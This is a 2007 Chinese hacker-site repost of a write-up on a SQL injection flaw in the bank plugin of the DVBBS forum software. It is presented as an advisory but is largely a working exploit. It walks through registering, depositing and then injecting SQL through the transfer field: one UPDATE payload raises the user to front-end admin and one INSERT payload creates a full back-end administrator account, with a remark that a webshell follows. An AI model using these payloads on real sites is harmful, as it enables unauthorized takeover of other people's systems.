文章 | 入侵攻击 | 安全防御 | 操作系统 | 网站建设 | 网络编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程
论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 美女贴图 | 灌水无罪 | 在线服务 | 会员照片 | 网站首页
 当前位置:主页 >> 安全公告 >> 漏洞公告 >> 文章内容  
 

 
动网论坛银行插件漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 文章作者:kon-bluesky
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

不知道这个漏洞以前是不是有过.不过即然我发现了.我就发表出来.跟大家一起学习下.

利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.

下面我就这个漏洞来详细的说明一个.文章所利用的网站.希望大家不要再破坏了.首先我们注册一个用户.这里我己经注册好了.我就不再注册了.用户名:kon-bluesky
=800)window.open('/UpLoadFiles/NewsPhoto/71bd58db.jpg');"src="http://hackbase.com/UpLoadFiles/NewsPhoto/71bd58db.jpg"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';"border=0>

然后大家去社区银行里面.首先存一下款.要不然等会转账的时候会出现错误.存好之后.我们就来转账.
=800)window.open('/UpLoadFiles/NewsPhoto/d4ee0e84.jpg');"src="http://hackbase.com/UpLoadFiles/NewsPhoto/d4ee0e84.jpg"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';"border=0>
在后面写上这条语句:test1';updatedv_usersetusergroupid=1whereuserid=107112--(userid就是你注册的用户ID,可以在用户列表里面看到)这条语句的作用是把我们注册的用户提升为前台管理员.成功之后.就是前台管理员了.然后再进行一次转账.跟上次一样的操作.不过语句不同了.提升为后台管理员语句:
test1';InsertintoDv_admin(Password,Username,Adduser,Flag)values('49ba59abbe56e057','kon-bluesky','kon-bluesky','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36')--  
(49ba59abbe56e057,MD5密码.根据自己所需进行改动.用户也是一样)这条语句就是把kon-bluesky提升为后台管理员.
=800)window.open('/UpLoadFiles/NewsPhoto/3a49d1eb.jpg');"src="http://hackbase.com/UpLoadFiles/NewsPhoto/3a49d1eb.jpg"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';"border=0>

至于怎么拿到WEBSHELL.就不在这篇文章的范围之内.很简单的.本地恢复就行了.

由于第一次在八进制上面发表文章.不是很熟.所以有很多图片都没有发上来.

   -------------------------------------------------------------------------------------------
  上一篇:没有了
  下一篇:DVBBS V7.1 SP1 Boke注入漏洞 VBS版
   -------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
Discuz! 6.0.0 0Day漏洞
视频语音聊天系统的漏洞
DVBBS 7.1.0 SP1博客远程
bbsxp上传注入漏洞
现代教务管理系统漏洞
MS05-055:Windows内核中
QQ幻想盗号器病毒 窃取游
沸腾新闻系统 V1.1 Access
动网8.0最新漏洞
NSFOCUS 2007年07月之十大
DNS漏洞攻击增多 微软忙着
mssql2005存手工注入漏洞
oblog商业版本4.6注射漏洞
PHPWind论坛5.3版postuplo
百度超级搜霸远程代码执行
DVBBS V7.1 SP1 Boke注入
DedeCMS最新版存在暴物理
QQ惊爆危险漏洞 360截获“
动易最新未公开漏洞
bo-blog2.0.3文件浏览漏洞
宁波都市网漏洞公告(通杀
Microsoft Internet Explo
乔客(joekoe) CMS 4.0 的2
雅虎窗件曝出缓冲区溢出漏
phpRPC库远程代码执行漏洞
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2007 Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号